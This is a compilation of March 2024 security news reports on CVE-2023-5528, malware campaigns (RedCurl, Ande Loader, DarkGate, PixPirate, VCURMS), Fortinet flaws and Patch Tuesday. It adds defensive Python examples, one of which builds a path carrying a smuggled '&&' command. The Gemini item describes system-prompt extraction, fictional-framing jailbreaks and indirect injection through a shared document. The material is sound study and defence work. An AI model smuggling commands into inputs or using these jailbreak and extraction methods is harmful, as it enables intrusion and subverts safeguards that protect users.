Tracked as CVE-2023-5528 (CVSS score: 7.2), the shortcoming impacts all versions of kubelet, including and after version 1.8.0. It was addressed as part of updates released on November 14, 2023, in the following versions -
kubelet v1.28.4
kubelet v1.27.8
kubelet v1.26.11, and
kubelet v1.25.16
"A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes," Kubernetes maintainers said in an advisory released at the time. "Kubernetes clusters are only affected if they are using an in-tree storage plugin for Windows nodes."
Successful exploitation of the flaw could result in a complete takeover of all Windows nodes in a cluster. It's worth noting that another set of similar flaws was previously disclosed by the web infrastructure company in September 2023.
The issue stems from the use of an "insecure function call and lack of user input sanitization," and relates to a feature called Kubernetes volumes, specifically a volume type known as local volumes that allows users to mount a disk partition in a pod by specifying or creating a PersistentVolume.
"While creating a pod that includes a local volume, the kubelet service will (eventually) reach the function 'MountSensitive(),'" Peled explained. "Inside it, there's a cmd line call to 'exec.command,' which makes a symlink between the location of the volume on the node and the location inside the pod."
This provides a loophole that an attacker can exploit by creating a PersistentVolume with a specially crafted path parameter in the YAML file, which triggers command injection and execution by using the "&&" command separator.
"In an effort to remove the opportunity for injection, the Kubernetes team chose to delete the cmd call, and replace it with a native GO function that will perform the same operation 'os.Symlink()'," Peled said of the patch put in place.
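The two patterns Peled contrasts, written in Python as an added example (not Akamai's or the Kubernetes project's code): the kubelet code in question is Go and shelled out to cmd.exe's mklink, so the command string here is a stand-in that is inspected but never executed, and the directory check in the hardened version is an assumption added for defence in depth.

```python
"""Added example (not Akamai's or the Kubernetes project's code): the injection
pattern behind CVE-2023-5528 and the shape of its fix, written in Python.  The
affected kubelet code is Go and shelled out to cmd.exe's mklink; the command
string here stands in for that and is only inspected, never executed.  The
hardened version calls the OS symlink primitive directly, as the patch does
with os.Symlink()."""
import os
import tempfile


def mklink_command_line(volume_path: str, pod_path: str) -> str:
    # Vulnerable pattern: the path taken from the PersistentVolume YAML is
    # spliced into a command line that a shell will parse, so nothing stops it
    # from carrying the "&&" separator mentioned above.
    return f"cmd /c mklink /D {pod_path} {volume_path}"


def commands_in(command_line: str) -> list:
    # Review aid: split the way cmd.exe would on "&&"; more than one non-empty
    # part means the volume path smuggled in an extra command.
    return [part.strip() for part in command_line.split("&&") if part.strip()]


def mount_local_volume(volume_path: str, pod_path: str) -> str:
    # Hardened pattern (what the patch does): the path goes to the symlink
    # primitive as data and is never parsed by a shell, so metacharacters are
    # inert.  Defence in depth (an assumption added here): the source must be
    # an existing directory.
    if not os.path.isdir(volume_path):
        raise ValueError(f"local volume path is not a directory: {volume_path!r}")
    os.symlink(volume_path, pod_path, target_is_directory=True)
    return os.readlink(pod_path)


def demo() -> dict:
    # Constructed inputs: a benign volume path and one carrying an extra command.
    crafted = r"C:\vol && echo injected"
    results = {
        "commands_in_crafted": len(commands_in(
            mklink_command_line(crafted, r"C:\pod\vol"))),
    }
    with tempfile.TemporaryDirectory() as tmp:
        volume = os.path.join(tmp, "volume")
        os.mkdir(volume)
        link = mount_local_volume(volume, os.path.join(tmp, "pod-vol"))
        results["safe_link_points_to_volume"] = link == volume
        try:
            mount_local_volume(crafted, os.path.join(tmp, "pod-evil"))
            results["crafted_rejected"] = False
        except ValueError:
            results["crafted_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```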
The disclosure comes as a critical security flaw discovered in the end-of-life (EoL) Zhejiang Uniview ISC camera model 2500-S (CVE-2024-0778, CVSS score: 9.8) is being exploited by threat actors to drop a Mirai botnet variant called NetKiller that shares infrastructure overlaps with a different botnet named Condi.
"The Condi botnet source code was released publicly on Github between August 17 and October 12, 2023," Akamai said. "Considering the Condi source code has been available for months now, it is likely that other threat actors [...] are using it."
RedCurl Cybercrime Group Abuses Windows PCA Tool for Corporate Espionage
14.3.24
BigBrothers
The Hacker News
The Russian-speaking cybercrime group called RedCurl is leveraging a legitimate Microsoft Windows component called the Program Compatibility Assistant (PCA) to execute malicious commands.
"The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs," Trend Micro said in an analysis published this month.
"Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities."
RedCurl, which is also called Earth Kapre and Red Wolf, is known to be active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company were targeted by the threat actor in November 2022 and May 2023 to pilfer confidential corporate secrets and employee information.
The attack chain examined by Trend Micro entails the use of phishing emails containing malicious attachments (.ISO and .IMG files) to activate a multi-stage process that starts with the use of cmd.exe to download a legitimate utility called curl from a remote server, which then acts as a channel to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to spawn a downloader process that takes care of establishing a connection with the same domain used by curl to fetch the loader.
The attack also makes use of the Impacket open-source software for unauthorized command execution.
The connections to Earth Kapre stem from overlaps in the command-and-control (C2) infrastructure as well as similarities with known downloader artifacts used by the group.
"This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries," Trend Micro said.
"The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its dedication to evading detection within targeted networks."
The development comes as the Russian nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun employing a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.
Pelmeni – which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS – is loaded by means of DLL side-loading. Once this spoofed DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar, Lab52 said.
Ande Loader Malware Targets Manufacturing Sector in North America
14.3.24
Virus
The Hacker News
The threat actor known as Blind Eagle has been observed using a loader malware called Ande Loader to deliver remote access trojans (RATs) like Remcos RAT and NjRAT.
The attacks, which take the form of phishing emails, targeted Spanish-speaking users in the manufacturing industry based in North America, eSentire said.
Blind Eagle (aka APT-C-36) is a financially motivated threat actor that has a history of orchestrating cyber attacks against entities in Colombia and Ecuador to deliver an assortment of RATs, including AsyncRAT, BitRAT, Lime RAT, NjRAT, Remcos RAT, and Quasar RAT.
The latest findings mark an expansion of the threat actor's targeting footprint, with phishing emails bearing RAR and BZ2 archives used to activate the infection chain.
The password-protected RAR archives come with a malicious Visual Basic Script (VBScript) file that's responsible for establishing persistence in the Windows Startup folder and launching the Ande Loader, which, in turn, loads the Remcos RAT payload.
In an alternative attack sequence observed by the Canadian cybersecurity firm, a BZ2 archive containing a VBScript file is distributed via a Discord content delivery network (CDN) link. The Ande Loader malware, in this case, drops NjRAT instead of Remcos RAT.
"Blind Eagle threat actor(s) have been using crypters written by Roda and Pjoao1578," eSentire said. "One of the crypters developed by Roda has the hardcoded server hosting both injector components of the crypter and additional malware that was used in the Blind Eagle campaign."
The development comes as SonicWall shed light on the inner workings of another loader malware family called DBatLoader, detailing its use of a legitimate-but-vulnerable driver associated with RogueKiller AntiMalware software (truesight.sys) to terminate security software as part of a Bring Your Own Vulnerable Driver (BYOVD) attack and ultimately deliver Remcos RAT.
"The malware is received inside an archive as an email attachment and is highly obfuscated, containing multiple layers of encryption data," the company noted earlier this month.
DarkGate Malware Exploits Recently Patched Microsoft Flaw in Zero-Day Attack
14.3.24
Vulnerability
The Hacker News
A DarkGate malware campaign observed in mid-January 2024 leveraged a recently patched security flaw in Microsoft Windows as a zero-day using bogus software installers.
"During this campaign, users were lured using PDFs that contained Google DoubleClick Digital Marketing (DDM) open redirects that led unsuspecting victims to compromised sites hosting the Microsoft Windows SmartScreen bypass CVE-2024-21412 that led to malicious Microsoft (.MSI) installers," Trend Micro said.
CVE-2024-21412 (CVSS score: 8.1) concerns an internet shortcut files security feature bypass vulnerability that permits an unauthenticated attacker to circumvent SmartScreen protections by tricking a victim into clicking on a specially crafted file.
It was fixed by Microsoft as part of its Patch Tuesday updates for February 2024, but not before it was weaponized by a threat actor called Water Hydra (aka DarkCasino) to deliver the DarkMe malware in attacks targeting financial institutions.
The latest findings from Trend Micro show that the vulnerability has come under broader exploitation than previously thought, with the DarkGate campaign leveraging it in conjunction with open redirects from Google Ads to proliferate the malware.
The sophisticated attack chain begins with victims clicking on a link embedded within a PDF attachment sent via a phishing email. The link deploys an open redirect from Google's doubleclick[.]net domain to a compromised web server hosting a malicious .URL internet shortcut file that exploits CVE-2024-21412.
Specifically, the open redirects are designed to distribute fake Microsoft software installers (.MSI) masquerading as legitimate software, such as Apple iTunes, Notion, and NVIDIA, which come fitted with a side-loaded DLL file that decrypts and infects users with DarkGate (version 6.1.7).
It's worth noting that another now-fixed bypass flaw in Windows SmartScreen (CVE-2023-36025, CVSS score: 8.8) has been employed by threat actors to deliver DarkGate, Phemedrone Stealer, and Mispadu over the past few months.
The abuse of Google Ads technologies allows threat actors to increase the reach and scale of their attacks through different ad campaigns that are tailored for specific audiences.
"Using fake software installers, along with open redirects, is a potent combination and can lead to many infections," security researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said. "It is essential to remain vigilant and to instruct users not to trust any software installer that they receive outside of official channels."
The development comes as the AhnLab Security Intelligence Center (ASEC) and eSentire revealed that counterfeit installers for Adobe Reader, Notion and Synaptics are being distributed via fake PDF files and seemingly legitimate websites to deploy information stealers like LummaC2 and the XRed backdoor.
It also follows the discovery of new stealer malware families like Planet Stealer, Rage Stealer (aka xStealer), and Tweaks (aka Tweaker), adding to the plethora of cyber threats that are capable of harvesting sensitive information from compromised hosts.
"Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers," Zscaler ThreatLabz said.
"Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware."
The PowerShell-based stealer is equipped to exfiltrate sensitive data, including user information, location, Wi-Fi profiles, passwords, Roblox IDs, and in-game currency details, to an attacker-controlled server via a Discord webhook.
Malvertising and social engineering campaigns have also been observed acting as an initial access vector to disseminate a wide range of stealer and remote access trojans like Agent Tesla, CyberGate RAT, Fenix botnet, Matanbuchus, NarniaRAT, Remcos RAT, Rhadamanthys, SapphireStealer, and zgRAT.
Fortinet Warns of Severe SQLi Vulnerability in FortiClientEMS Software
14.3.24
Vulnerability
The Hacker News
Fortinet has warned of a critical security flaw impacting its FortiClientEMS software that could allow attackers to achieve code execution on affected systems.
"An improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests," the company said in an advisory.
The vulnerability, tracked as CVE-2023-48788, carries a CVSS rating of 9.3 out of a maximum of 10. It impacts the following versions -
FortiClientEMS 7.2.0 through 7.2.2 (Upgrade to 7.2.3 or above)
FortiClientEMS 7.0.1 through 7.0.10 (Upgrade to 7.0.11 or above)
Horizon3.ai, which plans to release additional technical details and a proof-of-concept (PoC) exploit next week, said the shortcoming could be exploited to obtain remote code execution as SYSTEM on the server.
Fortinet has credited Thiago Santana from the FortiClientEMS development team and the U.K. National Cyber Security Centre (NCSC) for discovering and reporting the flaw.
Also fixed by the company are two other critical bugs in FortiOS and FortiProxy (CVE-2023-42789 and CVE-2023-42790, CVSS scores: 9.3) that could permit an attacker with access to the captive portal to execute arbitrary code or commands via specially crafted HTTP requests.
The below product versions are impacted by the flaws -
FortiOS version 7.4.0 through 7.4.1 (Upgrade to FortiOS version 7.4.2 or above)
FortiOS version 7.2.0 through 7.2.5 (Upgrade to FortiOS version 7.2.6 or above)
FortiOS version 7.0.0 through 7.0.12 (Upgrade to FortiOS version 7.0.13 or above)
FortiOS version 6.4.0 through 6.4.14 (Upgrade to FortiOS version 6.4.15 or above)
FortiOS version 6.2.0 through 6.2.15 (Upgrade to FortiOS version 6.2.16 or above)
FortiProxy version 7.4.0 (Upgrade to FortiProxy version 7.4.1 or above)
FortiProxy version 7.2.0 through 7.2.6 (Upgrade to FortiProxy version 7.2.7 or above)
FortiProxy version 7.0.0 through 7.0.12 (Upgrade to FortiProxy version 7.0.13 or above)
FortiProxy version 2.0.0 through 2.0.13 (Upgrade to FortiProxy version 2.0.14 or above)
While there is no evidence that the aforementioned flaws have come under active exploitation, unpatched Fortinet appliances have been repeatedly abused by threat actors, making it imperative that users move quickly to apply the updates.
PixPirate Android Banking Trojan Using New Evasion Tactic to Target Brazilian Users
13.3.24
Virus
The Hacker News
The threat actors behind the PixPirate Android banking trojan are leveraging a new trick to evade detection on compromised devices and harvest sensitive information from users in Brazil.
The approach allows it to hide the malicious app's icon from the home screen of the victim's device, IBM said in a technical report published today.
"Thanks to this new technique, during PixPirate reconnaissance and attack phases, the victim remains oblivious to the malicious operations that this malware performs in the background," security researcher Nir Somech said.
PixPirate, which was first documented by Cleafy in February 2023, is known for its abuse of Android's accessibility services to covertly perform unauthorized fund transfers using the PIX instant payment platform when a targeted banking app is opened.
The constantly mutating malware is also capable of stealing victims' online banking credentials and credit card information, as well as capturing keystrokes and intercepting SMS messages to access two-factor authentication codes.
Typically distributed via SMS and WhatsApp, the attack flow entails the use of a dropper (aka downloader) app that's engineered to deploy the main payload (aka droppee) to pull off the financial fraud.
"Usually, the downloader is used to download and install the droppee, and from this point on, the droppee is the main actor conducting all fraudulent operations and the downloader is irrelevant," Somech explained.
"In the case of PixPirate, the downloader is responsible not only for downloading and installing the droppee but also for running and executing it. The downloader plays an active part in the malicious activities of the droppee as they communicate with each other and send commands to execute."
The downloader APK app, once launched, prompts the victim to update the app to either retrieve the PixPirate component from an actor-controlled server or install it if it's embedded within itself.
What's changed in the latest version of the droppee is the absence of an activity with the action "android.intent.action.MAIN" and the category "android.intent.category.LAUNCHER", the intent filter that lets a user launch an app from the home screen by tapping its icon.
Put differently, the infection chain requires both the downloader and the droppee to work in tandem, with the former responsible for running the PixPirate APK by binding to a service exported by the droppee.
"Later, to maintain persistence, the droppee is also triggered to run by the different receivers that it registered," Somech said. "The receivers are set to be activated based on different events that occur in the system and not necessarily by the downloader that initially triggered the droppee to run."
"This technique allows the PixPirate droppee to run and hide its existence even if the victim removes the PixPirate downloader from their device."
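A manifest-level check for the launcher-hiding pattern described above, added here as an example (it is not IBM's or Cleafy's code). It assumes a static AndroidManifest.xml is available for inspection; the two manifests below are constructed samples, and their package names, service name and receiver actions were chosen for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ATTR_NAME = "{%s}name" % ANDROID_NS
ATTR_EXPORTED = "{%s}exported" % ANDROID_NS
MAIN_ACTION = "android.intent.action.MAIN"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"


def _has_launcher_filter(component):
    """True if an <intent-filter> on this component carries MAIN + LAUNCHER,
    i.e. the app gets a tappable icon on the home screen."""
    for flt in component.findall("intent-filter"):
        actions = {a.get(ATTR_NAME) for a in flt.findall("action")}
        categories = {c.get(ATTR_NAME) for c in flt.findall("category")}
        if MAIN_ACTION in actions and LAUNCHER_CATEGORY in categories:
            return True
    return False


def _is_exported(component):
    """Explicit android:exported, or the implicit export an intent-filter
    granted before Android 12 when the attribute was absent."""
    exported = component.get(ATTR_EXPORTED)
    if exported is not None:
        return exported.lower() == "true"
    return component.find("intent-filter") is not None


def analyze_manifest(xml_text):
    """Summarise launcher visibility, exported services and receiver triggers.

    The droppee pattern is: no launcher activity (no icon for the victim to
    notice) but an exported service another app can bind to, plus receivers
    that re-run the payload on system events."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    if app is None:
        raise ValueError("manifest has no <application> element")
    activities = app.findall("activity") + app.findall("activity-alias")
    has_launcher = any(_has_launcher_filter(a) for a in activities)
    exported_services = [
        s.get(ATTR_NAME) for s in app.findall("service") if _is_exported(s)
    ]
    receiver_actions = sorted({
        a.get(ATTR_NAME)
        for r in app.findall("receiver")
        for flt in r.findall("intent-filter")
        for a in flt.findall("action")
    })
    return {
        "package": root.get("package"),
        "has_launcher_activity": has_launcher,
        "exported_services": exported_services,
        "receiver_actions": receiver_actions,
        # Flag only the combination: hidden from the launcher AND reachable
        # from another app through an exported service.
        "suspicious_hidden_app": (not has_launcher) and bool(exported_services),
    }


# Constructed sample: an ordinary app with a launcher icon.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <application>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

# Constructed sample modelled on the droppee layout described in the article:
# no MAIN/LAUNCHER activity, an exported service for the downloader to bind to,
# and receivers registered for system events (all names chosen for illustration).
DROPPEE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.droppee">
  <application>
    <activity android:name=".HiddenActivity" android:exported="false"/>
    <service android:name="com.example.droppee.CmdService"
             android:exported="true"/>
    <receiver android:name=".WakeReceiver" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    for manifest in (BENIGN_MANIFEST, DROPPEE_MANIFEST):
        print(analyze_manifest(manifest))
```

The heuristic only raises the hidden-app flag when both conditions hold; a library-style app with no UI but no exported service is not flagged.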
The development comes as Latin American (LATAM) banks have become the target of a new malware called Fakext that employs a rogue Microsoft Edge extension named SATiD to carry out man-in-the-browser and web injection attacks with the goal of grabbing credentials entered in the targeted bank site.
It's worth noting that SAT ID is a service offered by Mexico's Tax Administration Service (SAT) to generate and update electronic signatures for filing taxes online.
In select cases, Fakext is engineered to display an overlay that urges the victim to download a legitimate remote access tool by purporting to be the bank's IT support team, ultimately enabling the threat actors to conduct financial fraud.
The campaign – active since at least November 2023 – singles out 14 banks operating in the region, a majority of which are located in Mexico. The extension has since been taken down from the Edge Add-ons store.
Researchers Highlight Google's Gemini AI Susceptibility to LLM Threats
13.3.24
AI
The Hacker News
Google's Gemini large language model (LLM) is susceptible to security threats that could cause it to divulge system prompts, generate harmful content, and carry out indirect injection attacks.
The findings come from HiddenLayer, which said the issues impact consumers using Gemini Advanced with Google Workspace as well as companies using the LLM API.
The first vulnerability involves getting around security guardrails to leak the system prompts (or a system message), which are designed to set conversation-wide instructions to the LLM to help it generate more useful responses, by asking the model to output its "foundational instructions" in a markdown block.
"A system message can be used to inform the LLM about the context," Microsoft notes in its documentation about LLM prompt engineering.
"The context may be the type of conversation it is engaging in, or the function it is supposed to perform. It helps the LLM generate more appropriate responses."
This is made possible due to the fact that models are susceptible to what's called a synonym attack to circumvent security defenses and content restrictions.
A second class of vulnerabilities relates to using "crafty jailbreaking" techniques to make the Gemini models generate misinformation surrounding topics like elections as well as output potentially illegal and dangerous information (e.g., hot-wiring a car) using a prompt that asks it to enter into a fictional state.
Also identified by HiddenLayer is a third shortcoming that could cause the LLM to leak information in the system prompt by passing repeated uncommon tokens as input.
"Most LLMs are trained to respond to queries with a clear delineation between the user's input and the system prompt," security researcher Kenneth Yeung said in a Tuesday report.
"By creating a line of nonsensical tokens, we can fool the LLM into believing it is time for it to respond and cause it to output a confirmation message, usually including the information in the prompt."
Another test involves using Gemini Advanced and a specially crafted Google document, with the latter connected to the LLM via the Google Workspace extension.
The instructions in the document could be designed to override the model's instructions and perform a set of malicious actions that enable an attacker to have full control of a victim's interactions with the model.
The disclosure comes as a group of academics from Google DeepMind, ETH Zurich, University of Washington, OpenAI, and McGill University revealed a novel model-stealing attack that makes it possible to extract "precise, nontrivial information from black-box production language models like OpenAI's ChatGPT or Google's PaLM-2."
That said, it's worth noting that these vulnerabilities are not novel and are present in other LLMs across the industry. The findings, if anything, emphasize the need for testing models for prompt attacks, training data extraction, model manipulation, adversarial examples, data poisoning and exfiltration.
"To help protect our users from vulnerabilities, we consistently run red-teaming exercises and train our models to defend against adversarial behaviors like prompt injection, jailbreaking, and more complex attacks," a Google spokesperson told The Hacker News. "We've also built safeguards to prevent harmful or misleading responses, which we are continuously improving."
The company also said it's restricting responses to election-based queries out of an abundance of caution. The policy is expected to be enforced against prompts regarding candidates, political parties, election results, voting information, and notable office holders.
Alert: Cybercriminals Deploying VCURMS and STRRAT Trojans via AWS and GitHub
13.3.24
Virus
The Hacker News
A new phishing campaign has been observed delivering remote access trojans (RAT) such as VCURMS and STRRAT by means of a malicious Java-based downloader.
"The attackers stored malware on public services like Amazon Web Services (AWS) and GitHub, employing a commercial protector to avoid detection of the malware," Fortinet FortiGuard Labs researcher Yurren Wan said.
An unusual aspect of the campaign is VCURMS' use of a Proton Mail email address ("sacriliage@proton[.]me") for communicating with a command-and-control (C2) server.
The attack chain commences with a phishing email that urges recipients to click on a button to verify payment information, resulting in the download of a malicious JAR file ("Payment-Advice.jar") hosted on AWS.
Executing the JAR file leads to the retrieval of two more JAR files, which are then run separately to launch the twin trojans.
Besides sending an email with the message "Hey master, I am online" to the actor-controlled address, VCURMS RAT periodically checks the mailbox for emails with specific subject lines to extract the command to be executed from the body of the missive.
This includes running arbitrary commands using cmd.exe, gathering system information, searching and uploading files of interest, and downloading additional information stealer and keylogger modules from the same AWS endpoint.
The information stealer comes fitted with capabilities to siphon sensitive data from apps like Discord and Steam, credentials, cookies, and auto-fill data from various web browsers, screenshots, and extensive hardware and network information about the compromised hosts.
VCURMS is said to share similarities with another Java-based infostealer codenamed Rude Stealer, which emerged in the wild late last year. STRRAT, on the other hand, has been detected in the wild since at least 2020, often propagated in the form of fraudulent JAR files.
"STRRAT is a RAT built using Java, which has a wide range of capabilities, such as serving as a keylogger and extracting credentials from browsers and applications," Wan noted.
The disclosure comes as Darktrace revealed a novel phishing campaign that's taking advantage of automated emails sent from the Dropbox cloud storage service via "no-reply@dropbox[.]com" to propagate a bogus link mimicking the Microsoft 365 login page.
"The email itself contained a link that would lead a user to a PDF file hosted on Dropbox, that was seemingly named after a partner of the organization," the company said. "The PDF file contained a suspicious link to a domain that had never previously been seen on the customer's environment, 'mmv-security[.]top.'"
Microsoft's March Updates Fix 61 Vulnerabilities, Including Critical Hyper-V Flaws
13.3.24
Vulnerability
The Hacker News
Microsoft on Tuesday released its monthly security update, addressing 61 different security flaws spanning its software, including two critical issues impacting Windows Hyper-V that could lead to denial-of-service (DoS) and remote code execution.
Of the 61 vulnerabilities, two are rated Critical, 58 are rated Important, and one is rated Low in severity. None of the flaws are listed as publicly known or under active attack at the time of the release, but six of them have been tagged with an "Exploitation More Likely" assessment.
The fixes are in addition to 17 security flaws that have been patched in the company's Chromium-based Edge browser since the release of the February 2024 Patch Tuesday updates.
Topping the list of critical shortcomings are CVE-2024-21407 and CVE-2024-21408, which affect Hyper-V and could result in remote code execution and a DoS condition, respectively.
Microsoft's update also addresses privilege escalation flaws in the Azure Kubernetes Service Confidential Container (CVE-2024-21400, CVSS score: 9.0), Windows Composite Image File System (CVE-2024-26170, CVSS score: 7.8), and Authenticator (CVE-2024-21390, CVSS score: 7.1).
Successful exploitation of CVE-2024-21390 requires the attacker to have a local presence on the device either via malware or a malicious application already installed via some other means. It also necessitates that the victim closes and re-opens the Authenticator app.
"Exploitation of this vulnerability could allow an attacker to gain access to multi-factor authentication codes for the victim's accounts, as well as modify or delete accounts in the authenticator app but not prevent the app from launching or running," Microsoft said in an advisory.
"While exploitation of this flaw is considered less likely, we know that attackers are keen to find ways to bypass multi-factor authentication," Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.
"Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts."
Another vulnerability of note is a privilege escalation bug in the Print Spooler component (CVE-2024-21433, CVSS score: 7.0) that could permit an attacker to obtain SYSTEM privileges but only upon winning a race condition.
The update also plugs a remote code execution flaw in Exchange Server (CVE-2024-26198, CVSS score: 8.8) that an unauthenticated threat actor could abuse by placing a specially crafted file onto an online directory and tricking a victim into opening it, resulting in the execution of malicious DLL files.
The vulnerability with the highest CVSS rating is CVE-2024-21334 (CVSS score: 9.8), which concerns a case of remote code execution affecting the Open Management Infrastructure (OMI).
"A remote unauthenticated attacker could access the OMI instance from the Internet and send specially crafted requests to trigger a use-after-free vulnerability," Redmond said.
"The first quarter of Patch Tuesday in 2024 has been quieter compared to the last four years," Narang said. "On average, there were 237 CVEs patched in the first quarter from 2020 through 2023. In the first quarter of 2024, Microsoft only patched 181 CVEs. The average number of CVEs patched in March over the last four years was 86."
This month's patches are oddly "light". We have patches for 60 vulnerabilities and 4 Chromium patches affecting Microsoft Edge. But only two of the vulnerabilities are rated as "Critical":
CVE-2024-21408: Windows Hyper-V Denial of Service Vulnerability
CVE-2024-21407: Windows Hyper-V Remote Code Execution Vulnerability
Oddly, Microsoft considers a DoS vulnerability "critical". However, a DoS against Hyper-V could have a significant impact, which may justify the rating. The code execution vulnerability justifies a rating of critical. However, exploitation requires an attacker to first gain a foothold inside a virtual machine.
Other vulnerabilities of interest:
CVE-2024-26198: A remote code execution vulnerability for Exchange Server. This is a DLL loading issue that is typically more difficult to exploit. Authentication is required to exploit the vulnerability.
Overall, this Patch Tuesday doesn't look too bad. Follow your normal patch management process. There is no need to get all worked up; tomorrow morning: Have some coffee, test... and later deploy once the tests are completed successfully.
CVE identifiers are not preserved in this copy of the table; an entry covering several CVEs appears as several rows.

Description | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
---|---|---|---|---|---|---|---
.NET and Visual Studio Denial of Service Vulnerability | No | No | - | - | Important | 7.5 | 6.7
Azure Data Studio Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.3 | 7.0
Azure SDK Spoofing Vulnerability | No | No | - | - | Important | 7.5 | 6.5
Chromium: CVE-2024-2173 Out of bounds memory access in V8 | No | No | - | - | - | - | -
Chromium: CVE-2024-2174 Inappropriate implementation in V8 | No | No | - | - | - | - | -
Chromium: CVE-2024-2176 Use after free in FedCM | No | No | - | - | - | - | -
Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Intel: CVE-2023-28746 Register File Data Sampling (RFDS) | No | No | - | - | Important | - | -
Microsoft AllJoyn API Denial of Service Vulnerability | No | No | - | - | Important | 7.5 | 6.5
Microsoft Authenticator Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.1 | 6.2
Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability | No | No | - | - | Important | 9.0 | 8.1
Microsoft Defender Security Feature Bypass Vulnerability | No | No | - | - | Important | 5.5 | 4.8
Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | - | - | Important | 7.6 | 6.6
Microsoft Edge for Android Spoofing Vulnerability | No | No | Less Likely | Less Likely | - | 4.3 | 3.8
Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft Intune Linux Agent Elevation of Privilege Vulnerability | No | No | - | - | Important | 6.6 | 5.9
Microsoft ODBC Driver Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft ODBC Driver Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft ODBC Driver Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft ODBC Driver Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft Office Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Microsoft QUIC Denial of Service Vulnerability | No | No | - | - | Important | 7.5 | 6.5
Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Microsoft Teams for Android Information Disclosure Vulnerability | No | No | - | - | Important | 5.0 | 4.4
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
NTFS Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 7.0
Open Management Infrastructure (OMI) Remote Code Execution Vulnerability | No | No | - | - | Important | 9.8 | 8.5
Outlook for Android Information Disclosure Vulnerability | No | No | - | - | Important | 7.5 | 6.5
Skype for Consumer Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Visual Studio Code Elevation of Privilege Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability | No | No | - | - | Important | 5.5 | 4.8
